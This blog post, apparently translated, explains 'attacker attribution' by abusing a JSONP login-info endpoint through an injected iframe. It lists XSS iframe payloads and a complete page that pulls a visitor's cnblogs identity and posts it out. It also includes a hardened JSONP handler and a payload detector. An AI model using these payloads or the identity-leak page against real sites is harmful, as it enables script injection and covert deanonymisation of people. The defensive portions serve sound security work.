可乐博客

A Brief Look at XSS Injection Through to Attacker Attribution

Social ID tracing

Social ID tracing works by injecting a JS script through an iframe and dynamically adding a script element whose src points at a JSONP endpoint, so the request goes out with the victim's cookies and the response (their logged-in identity) is carried out of band. This no longer works in newer versions of Chrome.

The tests here were done on Chrome 75. Before going further you need to understand the JS callback mechanism.

Callback mechanism

The endpoint being called returns a function body: a script that invokes the named callback with the data, so the callback function executes directly as soon as the script loads.
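As an added example (not code from the original post, and not cnblogs' own code), here is a model of such a JSONP endpoint in plain JavaScript: the weak form that any cross-site script load can invoke with the victim's cookies attached, beside a hardened form that constrains the callback name, refuses cross-site loads using Sec-Fetch-Site with a Referer/Origin allowlist fallback for older browsers, and issues the session cookie with SameSite=Lax. The function names, the allowlisted origin and the session object are assumptions.

```javascript
// Added example, not from the original post: a model JSONP endpoint showing
// why the callback mechanism leaks identity cross-site and how to close it.
// Function names, ALLOWED_ORIGINS and the session object are assumptions.

const ALLOWED_ORIGINS = new Set(['https://www.example.test']); // assumed first-party origin

// Weak handler: whoever makes the browser load this URL in a <script> gets
// back `test({...})`, and the session cookie rides along on that request.
function weakJsonp(query, session) {
  const cb = query.callback || 'callback';
  return {
    status: 200,
    headers: { 'Content-Type': 'application/javascript' },
    body: `${cb}(${JSON.stringify(session)});`,
  };
}

function deny(status, reason) {
  return { status, headers: { 'Content-Type': 'text/plain' }, body: reason };
}

// Hardened handler: same contract for same-site callers, refuses the rest.
function hardenedJsonp(query, headers, session) {
  const cb = query.callback || 'callback';

  // 1. Only a plain identifier may be a callback; otherwise the response
  //    itself becomes reflected XSS (e.g. callback=alert(1);//).
  if (!/^[A-Za-z_$][\w$]{0,63}$/.test(cb)) {
    return deny(400, 'invalid callback name');
  }

  // 2. Modern browsers send Sec-Fetch-Site; a <script src> issued from another
  //    site, or from an opaque-origin data: iframe, arrives as "cross-site".
  const site = String(headers['sec-fetch-site'] || '').toLowerCase();
  if (site === 'cross-site') {
    return deny(403, 'cross-site request refused');
  }

  // 3. Browsers without Fetch Metadata: fall back to an Origin/Referer allowlist.
  if (!site) {
    const ref = headers['origin'] || headers['referer'] || '';
    let refOrigin = '';
    try { refOrigin = new URL(ref).origin; } catch (_) { /* missing or unparsable */ }
    if (!ALLOWED_ORIGINS.has(refOrigin)) {
      return deny(403, 'referer not allowlisted');
    }
  }

  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript',
      'X-Content-Type-Options': 'nosniff', // body is only ever consumed as script
    },
    body: `/**/ ${cb}(${JSON.stringify(session)});`, // leading comment defeats Rosetta-Flash-style abuse
  };
}

// Session cookie attributes. SameSite=Lax keeps the cookie off cross-site
// <script> loads; Chrome has applied it by default since version 80, which is
// the usual reason the iframe/JSONP trick from the post stops working there.
function sessionCookie(value) {
  return `session=${encodeURIComponent(value)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Stand-alone run over constructed requests.
function demo() {
  const session = { user: 'alice', uid: 42 }; // constructed
  console.log(weakJsonp({ callback: 'test' }, session).body);
  console.log(hardenedJsonp({ callback: 'test' }, { 'sec-fetch-site': 'cross-site' }, session));
  console.log(hardenedJsonp({ callback: 'test' }, { 'sec-fetch-site': 'same-origin' }, session).body);
  console.log(sessionCookie('opaque-token'));
}
demo();
```

The allowlist fallback is only reached when Sec-Fetch-Site is absent; when it is present, its value is authoritative because the browser, not the page, sets it.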

PAYLOAD

</iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)
</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)

Several variants are listed below:

<iframe src="vbscript:msgbox(1)"></iframe> (IE)  
<iframe src="javascript:alert(1)"></iframe>
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
http://target.com/something.jsp?query=<script>eval(location.hash.slice(1))</script>#alert(1)

Consolidated payload

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Jsonp</title>
</head>
<body>
<!-- Jsonp -->

<!-- cnblogs -->
<iframe src="data:text/html,<script>eval(name)</script>" width="0" height="0" name="
    window.test = function(data) {
        let s = {source: 'cnblogs', d: data}; 
        window.parent.postMessage(s, '*');
    }
    let s = document.createElement('script');
    s.src = 'https://passport.cnblogs.com/user/LoginInfo?callback=test'
    document.documentElement.appendChild(s);
" style="border-width: 0px;"></iframe>

<script>
// Log whatever the iframe posts back; e is the MessageEvent delivered to this listener
window.addEventListener("message", function(e){
        console.log(e.data);
}, false);
</script>

</body>
</html>
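As an added example (not the post's code), here is a small JavaScript detector for the payload shapes in the list above and in the consolidated payload, the kind of check a WAF rule test or a review of stored user HTML would run. It normalises the iframe src (numeric entities, embedded whitespace, case), flags the javascript:, vbscript: and data: schemes, and flags the eval(name) trick. The function names and sample inputs are constructed.

```javascript
// Added example, not from the original post: a detector for the iframe
// payload shapes listed in the post, meant for a WAF rule test or a review
// of stored user HTML. Sample inputs below are constructed.

const DANGEROUS_SCHEMES = ['javascript', 'vbscript', 'data'];

// Undo the usual evasions before looking at the scheme: numeric entities,
// embedded whitespace/control characters, and mixed case.
function normaliseUrl(raw) {
  return raw
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&amp;/g, '&')
    .replace(/[\s\u0000-\u001f]/g, '')
    .toLowerCase();
}

// Match an <iframe ...> opening tag while respecting quoted attribute values,
// so a data: URI containing '>' does not cut the tag short.
const IFRAME_TAG = /<iframe\b((?:[^>"']|"[^"]*"|'[^']*')*)>/gi;
const SRC_ATTR = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;

function scanHtml(html) {
  const findings = [];
  IFRAME_TAG.lastIndex = 0;
  let m;
  while ((m = IFRAME_TAG.exec(html)) !== null) {
    const tag = m[0].slice(0, 80);
    const src = SRC_ATTR.exec(m[1]);
    if (!src) continue;
    const url = normaliseUrl(src[1] || src[2] || src[3] || '');
    const scheme = url.split(':')[0];
    if (DANGEROUS_SCHEMES.includes(scheme)) {
      findings.push({ kind: 'iframe-dangerous-scheme', scheme, snippet: tag });
    }
    // The consolidated payload smuggles its code through the frame's name
    // attribute and runs it with eval(name) inside a data: document.
    if (url.includes('eval(name)')) {
      findings.push({ kind: 'iframe-eval-name', scheme, snippet: tag });
    }
  }
  if (/<script\b/i.test(html)) {
    const sm = html.match(/<script\b[^>]*>?/i);
    findings.push({ kind: 'inline-script', snippet: sm[0].slice(0, 80) });
  }
  return findings;
}

function isSuspicious(html) {
  return scanHtml(html).length > 0;
}

// Constructed samples: one benign embed and the payload shapes from the post.
const SAMPLES = [
  '<iframe src="https://video.example.test/embed/123" width="560"></iframe>',
  '<iframe src="JaVaScRiPt:alert(1)"></iframe>',
  '<iframe src="&#106;ava&#x73;cript:alert(1)"></iframe>',
  '<iframe src="data:text/html;base64,AAAA"></iframe>',
  '<iframe src="data:text/html,<script>eval(name)</script>" name="window.parent.postMessage(1, \'*\')"></iframe>',
];

for (const s of SAMPLES) {
  const kinds = scanHtml(s).map((f) => f.kind).join(',') || '-';
  console.log(isSuspicious(s) ? 'FLAG' : 'ok  ', kinds, '|', s.slice(0, 60));
}
```

The tag regex deliberately tolerates `>` inside quoted attribute values; a naive `<iframe[^>]*>` stops at the `>` of the `<script>` inside the data: URI and never sees the scheme.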